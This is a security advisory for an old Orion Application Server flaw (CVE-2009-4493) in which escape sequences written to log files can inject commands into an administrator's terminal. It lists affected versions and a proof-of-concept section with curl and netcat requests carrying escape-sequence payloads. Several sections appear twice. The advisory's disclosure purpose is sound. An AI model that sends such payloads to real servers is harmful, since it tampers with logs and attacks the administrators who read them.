Orion Application Server Terminal Escape Sequence in Logs Command Injection Vulnerability
BID:37717
Info
Orion Application Server Terminal Escape Sequence in Logs Command Injection Vulnerability
| Bugtraq ID: | 37717 |
| Class: | Input Validation Error |
| CVE: |
CVE-2009-4493 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 11 2010 12:00AM |
| Updated: | Jan 11 2010 12:00AM |
| Credit: | Giovanni 'evilaliv3' Pellerano, Alessandro 'jekil' Tanasi, and Francesco 'ascii' Ongaro |
| Vulnerable: |
Orion* Orion Application Server 2.0.7 Orion* Orion Application Server 2.0.6 Orion* Orion Application Server 2.0.5 Orion* Orion Application Server 2.0.4 Orion* Orion Application Server 2.0.3 Orion* Orion Application Server 2.0.2 Orion* Orion Application Server 2.0.1 Orion* Orion Application Server 1.5.4 Orion* Orion Application Server 1.5.3 Orion* Orion Application Server 2.0 |
| Not Vulnerable: | |
Discussion
Orion Application Server Terminal Escape Sequence in Logs Command Injection Vulnerability
Orion Application Server is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in logfiles.
Attackers can exploit this issue to execute arbitrary commands in a terminal.
Orion Application Server 2.0.7 is vulnerable; other versions may also be affected.
Orion Application Server is prone to a command-injection vulnerability because it fails to adequately sanitize user-supplied input in logfiles.
Attackers can exploit this issue to execute arbitrary commands in a terminal.
Orion Application Server 2.0.7 is vulnerable; other versions may also be affected.
Exploit / POC
Orion Application Server Terminal Escape Sequence in Logs Command Injection Vulnerability
Attackers can exploit this issue with readily available tools.
The following examples are available:
curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a
echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
nc localhost 80 < payload
Attackers can exploit this issue with readily available tools.
The following examples are available:
curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a
echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
nc localhost 80 < payload
Solution / Fix
Orion Application Server Terminal Escape Sequence in Logs Command Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Orion Application Server Terminal Escape Sequence in Logs Command Injection Vulnerability
References:
References: